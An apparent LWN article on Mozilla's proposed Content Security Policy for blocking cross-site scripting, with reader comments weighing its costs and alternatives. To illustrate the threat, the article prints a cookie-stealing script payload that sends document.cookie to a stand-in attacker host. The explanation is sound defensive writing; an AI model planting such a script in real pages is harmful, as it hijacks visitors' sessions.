Mozilla's Content Security Policy
Cross-site scripting (XSS) is a common web application flaw that can lead to a wide variety of attacks. The problem, and ways to eliminate it, have been known for years, but new instances of XSS crop up regularly in web applications—live sites as well as packages like content management systems. Mozilla has taken the lead on a new security policy, Content Security Policy (CSP), which provides a way for sites to avoid XSS. It does that by fundamentally changing the way JavaScript content is treated by the browser, but does so in a way that allows sites to opt in to the new policy.
XSS works by injecting JavaScript content into the data returned by a web server. Normally that happens because some kind of user input was not properly filtered before it was echoed back on a web page. If that user input—in the form of a comment on an article, for example—contains unfiltered JavaScript, the user's browser will happily execute it as if it originated with the site. At that point, attacker-controlled code is running with the privileges of the browser user and the origin site.
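To make the attack concrete, consider a comment field that is echoed back unfiltered. A classic cookie-stealing payload (the attacker's URL is, of course, hypothetical) might look like this:

    Nice article!
    <script>
      // runs with the privileges of the viewing user and the origin site
      document.location = 'http://attacker.example/steal?c=' +
          encodeURIComponent(document.cookie);
    </script>

Every visitor who views that comment silently hands their session cookie to the attacker.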
As described by Mozilla security program manager Brandon Sterne on the Mozilla Security Blog, CSP changes that model. Instead of treating all content received in a response as having the same privilege level, CSP allows the site owner to explicitly list what kinds of JavaScript to trust. In order to do that, however, CSP strictly limits where JavaScript can originate and where it can appear in HTML.
Basically, CSP allows a site operator to list hosts from which JavaScript content will be accepted. If that option is used (via an HTTP X-Content-Security-Policy header or an HTML <META> tag), all JavaScript must be loaded from external files served by hosts on the list—all other mechanisms for executing JavaScript are disabled for that page. Sterne describes it this way:
Note that we are not eliminating event handlers, just the ability to specify them inline. AddEventListener() will still work, as will setting the .click property of a DOM node. This is a little cumbersome, but there are already sites that do this for some of their content.
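As a rough illustration of what this looks like in practice (the host names are hypothetical, and the directive syntax follows Mozilla's early draft, so it may change), a site might send a policy header and move its inline handlers into an external file:

    X-Content-Security-Policy: allow 'self'; script-src 'self' static.example.com

    <!-- before: inline handler, which CSP refuses to execute -->
    <a href="#" onclick="save()">Save</a>

    <!-- after: no inline JavaScript; the logic lives in an external file on an allowed host -->
    <a href="#" id="save-link">Save</a>
    <script src="/js/app.js"></script>

    // in /js/app.js, where save() is defined
    document.getElementById('save-link').addEventListener('click', save, false);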
This will be an enormous change for sites that want to use CSP, but it is backward-compatible with older browsers (or those that do not support CSP), and there are ways to approach the implementation incrementally. Sterne notes that all sites should be able to make the switch, and Mozilla intends to provide a migration guide to help sites convert to CSP. But it remains to be seen whether sites will actually use it. Mozilla security lead Daniel Veditz commented about that in the bug entry that tracks CSP implementation:
CSP is a gamble, it could be that the hurdle will turn out to be too high. But if we can get authors over that hurdle we can promise them a safer site.
Another interesting feature of CSP is its ability to notify a site when there is an attempt to violate the policy. This will even benefit users of browsers that don't support CSP, as XSS holes can be recognized and fixed more quickly. Sterne is optimistic about the effect CSP will have.
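Reporting is driven by the policy itself. In the draft syntax, a directive along these lines (the report URL is hypothetical) asks the browser to POST a violation report back to the site whenever the policy blocks something:

    X-Content-Security-Policy: allow 'self'; report-uri /csp-violation-report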
The open question is whether site operators are concerned enough about XSS to change the way they handle JavaScript. Over time, automated tools may help with that process, which could lower the bar somewhat, but it is still a daunting task. One would guess that the other browsers will take a "wait and see" attitude before deciding whether to implement it. Though the implementation is progressing, there is no word from Mozilla on when it might release a browser with CSP either.
Perhaps CSP is too heavy-handed a solution to the XSS problem, but it is good to see Mozilla taking the lead in trying to find something that will alleviate it. There are other, similar efforts in the works at Mozilla, including the Origin header to mitigate cross-site request forgery and clickjacking.
While these web application vulnerabilities are largely understood and techniques to avoid them are known, they keep cropping up. Finding ways to make users' browsers more resistant to these kinds of attacks can only help improve web security.
Index entries for this article

Security: Cross-site scripting (XSS)
Security: Web browsers
Mozilla's Content Security Policy
Posted Jul 2, 2009 9:45 UTC (Thu) by tzafrir (subscriber, #11501) [Link] (1 responses)
Mozilla's Content Security Policy
Posted Jul 2, 2009 13:02 UTC (Thu) by mrshiny (subscriber, #4266) [Link]
This policy has the potential to be extremely powerful, but the difficulty of implementation is relatively high, especially for many of the popular sites. However, for any site which doesn't have ads it could be done easily. I know that the site I maintain would need some framework upgrades to support this feature; however, when coding with this approach in mind, it is easy enough to apply. And it's fully backwards compatible, which is great.
Standards?
Posted Jul 2, 2009 10:06 UTC (Thu) by alex (subscriber, #1355) [Link] (3 responses)
Standards?
Posted Jul 2, 2009 16:13 UTC (Thu) by JoeBuck (subscriber, #2330) [Link] (2 responses)

When a standard invents new functionality, it's usually a mistake. It's better to gain experience with a prototype implementation, and if it works well, standardize that. If a browser maker announces an experimental feature and does not assert patent rights that block others from using it, and it works out well, the standards committees can then add it to future standards.
Standards?
Posted Jul 2, 2009 16:29 UTC (Thu) by alex (subscriber, #1355) [Link] (1 responses)

It would be interesting to know what Opera/Microsoft/WebKit developers think would help solve the problem.
Standards?
Posted Jul 6, 2009 14:08 UTC (Mon) by sbergman27 (guest, #10767) [Link]

"""
...when I saw a browser was "innovating" I had flash backs of the bad old days of proprietary HTML tags.
"""

As well you should. I don't recall anyone at Netscape or MS asserting patent rights that blocked others from using their proprietary stuff. They were both just doing their own thing and playing the NIH game... as seems to be happening here. This does look very much like the bad old days of proprietary HTML tags. The standards should come first.
Mozilla's Content Security Policy
Posted Jul 2, 2009 14:27 UTC (Thu) by butlerm (subscriber, #13312) [Link] (4 responses)

Unless your application has a large number of places that are vulnerable to being incorrectly coded to output large user submitted text fields without encoding or user submitted html content without sanitization checks, the added value of this system is approximately zero.

Enabling this policy also makes it effectively impossible to use dynamically generated javascript without generating a bunch of little temporary files, and forcing the web browser to submit secondary requests to fetch them. That has major performance implications due to turn around latency. It also seriously complicates the application development process.

For applications produced in an environment where developers are unaware or unable to follow basic security practices, or where even a temporary unpatched "XSS" vulnerability is a serious matter, it would be far better to propose an extension where script tags needed to carry an attribute with a generated value that matched a value supplied in the HTTP response headers.

That would effectively eliminate any real possibility of the web browser executing a hostile user submitted script, due to the impossibility of predicting a match, and the change in the generated value on every request.
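What butlerm proposes is essentially a per-response script token (what later CSP work would call a nonce). A minimal sketch of the idea, with a made-up header name and attribute:

    HTTP/1.1 200 OK
    X-Script-Token: d41d8c...    (a fresh random value generated for every response)

    <!-- emitted by the site, which knows the token, so the browser runs it -->
    <script token="d41d8c...">initPage();</script>

    <!-- injected by an attacker, who cannot predict the token, so it is ignored -->
    <script>stealCookies();</script>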
Mozilla's Content Security Policy
Posted Jul 2, 2009 17:17 UTC (Thu) by joey (guest, #328) [Link] (2 responses)

I think you're probably right, which is a real pity, since sanitizing user-supplied html to remove all possible means of javascript injection is very tricky.

I wish this CSP could be turned on at a block level. Something like:

<csp="no-javascript">
user supplied html here
</csp>
Mozilla's Content Security Policy
Posted Jul 2, 2009 17:19 UTC (Thu) by joey (guest, #328) [Link]

BTW, right after I posted that, I found a javascript stripping bug in lwn.net, which I've emailed to Jon. :-/
Mozilla's Content Security Policy
Posted Jul 11, 2009 19:09 UTC (Sat) by tulcod (guest, #59536) [Link]
What Mozilla proposed is not a solution either, though: there is no reason users cannot upload scripts to a host. Heck, websites on most free webhosts would still be vulnerable. I think a better solution would be to only allow javascript to exist in the <head> tag, although this wouldn't be a solution for websites which, for whatever weird reason, would allow users to put stuff in the <head> of a webpage. XSS is an inherent problem with launching scripts from editable content. It would be better to disallow <script> tags completely and use a different mechanism to use javascript on a webpage alongside the HTML delivery, but that would mean properties like onclick and onmouseover would also have to be banned, which induces some rather serious limitations (read: webmasters won't like this).
For now, I'll stick with bbcode and some url encoding.
ps: wow, "webmasters". when was the last time I used that phrase?
Mozilla's Content Security Policy
Posted Jul 9, 2009 13:03 UTC (Thu) by swiftone (guest, #17420) [Link]

"""
Unless your application has a large number of places that are vulnerable to being incorrectly coded to output large user submitted text fields without encoding or user submitted html content without sanitization checks, the added value of this system is approximately zero.
"""

Any site that accepts user input has places that are vulnerable to being incorrectly coded. And as simple as correct coding is, it doesn't take much effort to discover that a large number of sites are doing poorly at it, either because it turns out that cleansing input is non-trivial after all, or because it is easy to be lazy.

It takes only one developer to screw up in one place to leave a site vulnerable. Because of attacks like Cross Site Request Forgery (generating a request to a different app that the user is authenticated to), a developer on one app can leave another otherwise secure app vulnerable.

This policy allows the server administrator to greatly reduce the threat in a single fell swoop. I would not call that added value "zero".

Meanwhile the cost is: it is true that this makes dynamically generated javascript difficult. But who (outside of attackers) uses dynamically generated javascript? With the large array of stable and useful JS libraries available, there should be no need for such butchery. (JSON parsers/generators are specifically mentioned as not being a problem in the CSP FAQ.) Is there some bastion of useful dynamically generated JS that I am unaware of?

These costs seem far from prohibitive for the benefit in my opinion.
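The standard replacement for dynamically generated JavaScript is to generate only data and keep the code static. A sketch of the pattern (the URL and element id are invented), using era-appropriate XMLHttpRequest:

    // served as a static external file from an allowed host
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/user-data.json', true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState === 4 && xhr.status === 200) {
            // the dynamic part arrives as JSON data, not as executable code
            var data = JSON.parse(xhr.responseText);
            document.getElementById('greeting').textContent = 'Hello, ' + data.name;
        }
    };
    xhr.send(null);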
Mozilla's Content Security Policy
Posted Jul 2, 2009 16:03 UTC (Thu) by alankila (guest, #47141) [Link] (2 responses)
Mozilla's Content Security Policy
Posted Jul 2, 2009 16:16 UTC (Thu) by JoeBuck (subscriber, #2330) [Link] (1 responses)

A bank or an online commerce site might still think that the tradeoff is worth it. In a situation where an XSS attack costs either the bank or the customer real money, it could be worth the tradeoff.
Mozilla's Content Security Policy
Posted Jul 4, 2009 9:08 UTC (Sat) by NAR (subscriber, #1313) [Link]
why not sha checksum?
Posted Jul 2, 2009 16:48 UTC (Thu) by ccyoung (guest, #16340) [Link] (3 responses)
this would allow on-page javascript to stay - in my case a good idea since a lot of the javascript itself is dynamic.
why not sha checksum?
Posted Jul 2, 2009 23:20 UTC (Thu) by riddochc (guest, #43) [Link] (2 responses)

Think about this some. What are you taking the SHA sum of? The content of the page, of course. Say, for example, that the page in question contains a number of user-entered comments, like this one on LWN you're reading. Those comments were probably stored in a database - a script pulls them out, and inserts them into the appropriate places of the page.

Your checksum won't tell you whether there's references to javascript in the content that's been sent to your browser. If the server didn't filter them properly, and your browser just does as it's told (without giving you control over whether it should treat any individual portion as code or data), then your SHA sum will tell you that yes, indeed, the malicious code was malicious before it went into the comment system in the first place.
not following
Posted Jul 2, 2009 23:44 UTC (Thu) by ccyoung (guest, #16340) [Link] (1 responses)

no javascript executes before the hash is completed (perhaps one hash for the head and one for the body might speed things up).

is this impossible to do?
not following
Posted Jul 3, 2009 1:00 UTC (Fri) by riddochc (guest, #43) [Link]

No, taking a hash of any page is very easy to do. It simply doesn't do anything to solve this problem.

Suppose you're in charge of a city with a high rate of criminals breaking into people's houses. Your solution basically amounts to renaming the house numbers on every street, in the hopes that that will prevent criminals from finding houses to break into -- nevermind that they're already on the street in front of the physical buildings.

By the time the nefarious content has reached the browser, if the browser just goes on its merry way interpreting any javascript it's been sent, it doesn't matter much what else the server says to the client. If someone managed to insert javascript code into their comment, and submit it to the server so it'll show up in another user's browser, the TV's already on the sidewalk.

What the Mozilla proposal basically amounts to is making the browser not just interpret any random javascript it's been sent, but letting the website authors say, "Javascript that comes from here (the site's trusted javascript), go ahead and run - but ignore any other javascript, or triggers for it, you see on the web page."
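riddochc's objection to the checksum idea fits in a few lines of server-side pseudo-JavaScript (the function names are invented): the hash is computed over whatever the server is about to send, injected markup included, so it cheerfully verifies the attack along with the page:

    // the page is assembled from stored content first...
    var page = renderTemplate(loadCommentsFromDatabase());  // may already contain an injected <script>
    // ...and only hashed afterward, so the digest covers the payload too
    var digest = sha1(page);
    sendResponse({ 'X-Page-Hash': digest }, page);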